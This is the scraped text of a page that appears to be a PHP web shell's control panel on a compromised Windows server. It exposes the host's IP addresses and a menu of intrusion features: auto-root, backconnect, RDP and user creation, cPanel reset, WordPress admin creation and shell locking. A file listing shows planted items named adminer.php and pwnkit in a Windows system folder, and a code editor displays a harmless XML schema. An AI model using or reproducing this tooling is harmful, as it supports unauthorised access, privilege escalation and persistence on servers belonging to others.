Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.139
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
Windows /
security /
[ HOME SHELL ]
Name
Size
Permission
Action
ApplicationId
[ DIR ]
drwxrwxrwx
audit
[ DIR ]
drwxrwxrwx
cap
[ DIR ]
drwxrwxrwx
database
[ DIR ]
drwxrwxrwx
logs
[ DIR ]
drwxrwxrwx
msscw
[ DIR ]
drwxrwxrwx
templates
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
FirewallPolicy.xsd
17.54
KB
-rw-rw-rw-
KB.xsd
23.08
KB
-rw-rw-rw-
KBRegistration.xsd
1.87
KB
-rw-rw-rw-
KBRegistrationInfo.xsd
1.07
KB
-rw-rw-rw-
RuleResults.xsd
3.16
KB
-rw-rw-rw-
SMEFRules.xml
5.45
KB
-rw-rw-rw-
SampleMachineList.xml
484
B
-rw-rw-rw-
SecPol.xsd
2.97
KB
-rw-rw-rw-
SecReg.xsd
2.45
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : RuleResults.xsd
<?xml version="1.0" encoding="utf-8" ?> <xsd:schema elementFormDefault="qualified" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <!-- CheckResults is the top level element for the extensions scan results. it is attributed by the extension Name as well as the max severity reported by the extension. Optionaly the extension could supply a link to be associated with its results. CheckResults contains Items element which is a list of items reported by the extension. --> <xsd:element name="CheckResults"> <xsd:complexType> <xsd:sequence> <xsd:element name="Items" type="ItemsType" minOccurs="0" maxOccurs="1" /> </xsd:sequence> <xsd:attribute name="Name" type="xsd:string" use="required" /> <xsd:attribute name="Version" type="xsd:string" use="required" /> <xsd:attribute name="Severity" type="xsd:string" use="required" /> <xsd:attribute name="Link" type="xsd:string" use="optional" /> <xsd:attribute name="Tag" type="xsd:string" use="optional"/> </xsd:complexType> </xsd:element> <xsd:complexType name="ItemsType"> <xsd:sequence> <xsd:element name="Item" type="ItemType" minOccurs="0" maxOccurs="unbounded" /> </xsd:sequence> </xsd:complexType> <!-- Each Item has a severity, and primary key and value attributes. Each Item can contain properties and/or propertygroups. --> <xsd:complexType name="ItemType"> <xsd:sequence> <xsd:element name="Property" type="PropertyType" minOccurs="0" maxOccurs="unbounded" /> <xsd:element name="PropertyGroup" type="PropertyGroupType" minOccurs="0" maxOccurs="unbounded" /> <xsd:element name="Remediation" type="RemedationType" minOccurs="0" maxOccurs="1"/> </xsd:sequence> <xsd:attribute name="Severity" type="xsd:string" use="required" /> <xsd:attribute name="Key" type="xsd:string" use="required" /> <xsd:attribute name="Value" type="xsd:string" use="required" /> </xsd:complexType> <!-- A propertygroup is a keyed collection of sub properties and/or propertygroups. --> <xsd:complexType name="PropertyGroupType"> <xsd:sequence minOccurs="0" maxOccurs="unbounded"> <xsd:element name="Property" type="PropertyType" minOccurs="0" maxOccurs="unbounded" /> <xsd:element name="PropertyGroup" type="PropertyGroupType" minOccurs="0" maxOccurs="unbounded" /> </xsd:sequence> <xsd:attribute name="Key" type="xsd:string" use="optional" /> </xsd:complexType> <!-- a Property is a Keyed list of arbitrary Fields. --> <xsd:complexType name="PropertyType"> <xsd:sequence> <xsd:element name="Field" type="AnyContentType" minOccurs="0" maxOccurs="unbounded" /> </xsd:sequence> <xsd:attribute name="Key" type="xsd:string" use="required" /> </xsd:complexType> <xsd:complexType name="RemedationType"> <xsd:sequence> <xsd:any processContents="skip" minOccurs="0" maxOccurs="unbounded" /> </xsd:sequence> </xsd:complexType> <xsd:complexType name="AnyContentType" mixed="true"> <xsd:sequence> <xsd:any processContents="skip" minOccurs="0" maxOccurs="unbounded" /> </xsd:sequence> </xsd:complexType> </xsd:schema>
Close